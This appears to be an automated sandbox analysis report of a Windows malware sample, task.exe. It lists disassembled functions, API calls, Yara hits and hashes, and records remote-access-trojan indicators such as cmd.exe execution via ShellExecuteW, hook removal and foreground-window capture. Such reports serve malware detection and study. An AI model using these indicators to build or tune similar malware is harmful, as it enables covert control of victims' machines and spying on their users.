                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                                                                                                                • API String ID: 0-1711242015
                                                                                                                                                                • Opcode ID: 784fbfba2ef15d8a2fd5e7c21b7dc9968e9be9b419495e360c66457932c56838
                                                                                                                                                                • Instruction ID: eadd255be8ca90d9ccbd9d9a10bdb06dbdcbf212eedbf3ad77cff19e1a5997b5
                                                                                                                                                                • Opcode Fuzzy Hash: 784fbfba2ef15d8a2fd5e7c21b7dc9968e9be9b419495e360c66457932c56838
                                                                                                                                                                • Instruction Fuzzy Hash: 73717C759017089FDB11DFA8D8407EEBFB5AF05328F24416AE865AF390DB72A901CBD1
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free_strpbrk
                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                • API String ID: 3300345361-3972193922
                                                                                                                                                                • Opcode ID: 43bd902f0f36130778f4388e5d84a84ffd24785bc51953699fdf19ac985b95f9
                                                                                                                                                                • Instruction ID: eadb9f2e84c851d8f5a3a8a0c9d58eaa40935515b4723603077a150ce2c8af05
                                                                                                                                                                • Opcode Fuzzy Hash: 43bd902f0f36130778f4388e5d84a84ffd24785bc51953699fdf19ac985b95f9
                                                                                                                                                                • Instruction Fuzzy Hash: 89515D75E0020AAFDF14DFA9C880AADBBB9FF88314F24816ED855E7340E7759A019F54
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\task.exe,00000104), ref: 10004C1D
                                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                • String ID: C:\Users\user\task.exe
                                                                                                                                                                • API String ID: 2506810119-325489873
                                                                                                                                                                APIs
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(-00000003,6FE7AFD9,?,?,\o(), ref: 6FEA535D
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(00000005,6FE7AFD9,?,?,\o(), ref: 6FEA539B
                                                                                                                                                                • WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,?,?,\o(), ref: 6FEA53AF
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: is_unlocked(state)\o(, xrefs: 6FEA53BF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressWake$Single
                                                                                                                                                                • String ID: assertion failed: is_unlocked(state)\o(
                                                                                                                                                                • API String ID: 1135737206-940078219
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00065276), ref: 00065292
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000652E9
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 000652F8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                • String ID: Connection Timeout
                                                                                                                                                                • API String ID: 2055531096-499159329
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6FE952C3,00000000,?,00000001,?,?,?,6FE953B2,00000001,FlsFree,6FEB1940,FlsFree), ref: 6FE9531F
                                                                                                                                                                • GetLastError.KERNEL32(?,6FE952C3,00000000,?,00000001,?,?,?,6FE953B2,00000001,FlsFree,6FEB1940,FlsFree,00000000,?,6FE94234), ref: 6FE95329
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6FE95351
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00074475
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                                • String ID: /C $cmd.exe$open
                                                                                                                                                                • API String ID: 587946157-3896048727
                                                                                                                                                                APIs
                                                                                                                                                                • TerminateThread.KERNEL32(00069E0E,00000000,000D22B8,pth_unenc,0006CA8C,00000000,0006E356), ref: 0006B46B
                                                                                                                                                                • UnhookWindowsHookEx.USER32(000D20B8), ref: 0006B477
                                                                                                                                                                • TerminateThread.KERNEL32(00069DF3,00000000), ref: 0006B485
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 3123878439-4028850238
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6FE803BE
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6FE803E2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE80440
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE804A1
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE804C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 5ec79b263cdc3f396cfa3df65f470d5dd3eef2ab1e7a1e65c7e05f4884c459bd
                                                                                                                                                                • Instruction ID: 0d1e1fe1b447e500c86631a8800407428b27ca7bf00df798717012897770af83
                                                                                                                                                                • Opcode Fuzzy Hash: 5ec79b263cdc3f396cfa3df65f470d5dd3eef2ab1e7a1e65c7e05f4884c459bd
                                                                                                                                                                • Instruction Fuzzy Hash: 44C127719042569FDF22EF68CC80BBA7FAAFF82314F94419AD4849B251F7718E11CB58
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,00000000,?,00000004,00000010,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE80292
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,00000010,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE802B8
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE802CE
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE8030D
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE80348
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: e07052054938ad7b512e6010ea29fe3e7557dd54f99814fca519e2d79606d102
                                                                                                                                                                • Instruction ID: 5afc7abeca2a1b497deacb5bc68b169c05a567afaca605b7977e04002a0f3a10
                                                                                                                                                                • Opcode Fuzzy Hash: e07052054938ad7b512e6010ea29fe3e7557dd54f99814fca519e2d79606d102
                                                                                                                                                                • Instruction Fuzzy Hash: 50216E717066015FEB11176CA845B993F999BC3329F28446BF66DCB3C1DB62D4508321
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(8C5F75A1,00000000,00000000,?), ref: 6FE9CC67
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FE9CEB9
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FE9CEFF
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE9CFA2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                • Opcode ID: b2f679e930c43d216fda57dcbe6f00b5819416bf305fd1a3051da940a0661ff4
                                                                                                                                                                • Instruction ID: b35314b46c559b7f26633bbad2f069b2139b82c35082521bc23fd7ec3f71c48b
                                                                                                                                                                • Opcode Fuzzy Hash: b2f679e930c43d216fda57dcbe6f00b5819416bf305fd1a3051da940a0661ff4
                                                                                                                                                                • Instruction Fuzzy Hash: CCD15B75E04649AFCB01DFA8C8809EDBFF5FF49314F24412AE466AB351D730A946CB60
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                • Opcode ID: 2d376f2826970ee9c1bc0c142abbfc6f4b1a02a128c36b00186c1c80ddbe8d0f
                                                                                                                                                                • Instruction ID: 07f139ececc517a469c584e3b6bce374a8b380bf0cfdc438c2ae8569d6d517d2
                                                                                                                                                                • Opcode Fuzzy Hash: 2d376f2826970ee9c1bc0c142abbfc6f4b1a02a128c36b00186c1c80ddbe8d0f
                                                                                                                                                                • Instruction Fuzzy Hash: CCA138B29203869FEF218F28C8917AEFFA6FF59314F1445ABD5859B241E3348941CB58
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c6e78087a6074374e60cb7cf25c28b241ee19c93e337e705e7d1dca0f62e355b
                                                                                                                                                                • Instruction ID: b2a6196daefac59f9116d4520a1fc8e22ef6c5bf146b466421d04e2093e4de29
                                                                                                                                                                • Opcode Fuzzy Hash: c6e78087a6074374e60cb7cf25c28b241ee19c93e337e705e7d1dca0f62e355b
                                                                                                                                                                • Instruction Fuzzy Hash: F3C10370D0425A9FDF11DFA8C884BBDBFB6BF4A300F184189E415A7392C7719941CB69
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                • Opcode ID: f3370491d4d9212630e304e73714ee1519e43b06782d75c99d004e0263f77fbf
                                                                                                                                                                • Instruction ID: 5be6cf005ac2b1dbdf97945bac92624a4508c2899d66c82a33f1b4f466ed986c
                                                                                                                                                                • Opcode Fuzzy Hash: f3370491d4d9212630e304e73714ee1519e43b06782d75c99d004e0263f77fbf
                                                                                                                                                                • Instruction Fuzzy Hash: 7C519D72904706AFEB19CF64D940BAA7FA4FF45318F30862FE96546690D732F941CBA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2250ecd4fbdf91485276d935d35989a57b56f6bc7815a8c7b387504c4642240b
                                                                                                                                                                • Instruction ID: f5159dfd9cdf6ed59a0c6ce1aa793dc479d5a191cbf8be4078553f1ac1c8dbd1
                                                                                                                                                                • Opcode Fuzzy Hash: 2250ecd4fbdf91485276d935d35989a57b56f6bc7815a8c7b387504c4642240b
                                                                                                                                                                • Instruction Fuzzy Hash: 1F41E772600705AFD724BF78CC41B6E7BEAFBCC710F50462AE516EBA80D7B195418B94
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE9AEE5
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6FE9AEEC
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6FE9AF26
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6FE9AF2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                • Opcode ID: 9e981b61d3fa23a2f85307624ffb8223cdd74446a695ec16283e25e9723ff1f2
                                                                                                                                                                • Instruction ID: bb70740fd5523eda7addc03bf4ac5e1b16dcf3ac1b140d3915e667eaad2fa188
                                                                                                                                                                • Opcode Fuzzy Hash: 9e981b61d3fa23a2f85307624ffb8223cdd74446a695ec16283e25e9723ff1f2
                                                                                                                                                                • Instruction Fuzzy Hash: 8B21B071A88705AFCB209F69CC8491BBFA9EF02768720852CE815DB290D730FD9087B0
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6FE9C321
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE9C359
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE9C379
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                • Opcode ID: 2114f8cd0ab9e9efe2c70d711bab538af4060cc46875b1f9f04d6ff015f097c1
                                                                                                                                                                • Instruction ID: 761f4018e7713c0b6b4e9aeacc2284c2709e273e097fae1b398bbfb9ad36258b
                                                                                                                                                                • Opcode Fuzzy Hash: 2114f8cd0ab9e9efe2c70d711bab538af4060cc46875b1f9f04d6ff015f097c1
                                                                                                                                                                • Instruction Fuzzy Hash: 4E11C8B2605A167EA72167BD8CCCCAF2D6DDF8729C760016DF901D1240FB24DE514271
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetForegroundWindow.USER32(76F90F00,?), ref: 0007A7D0
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetWindowTextLengthW.USER32(00000000), ref: 0007A7D9
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0007A803
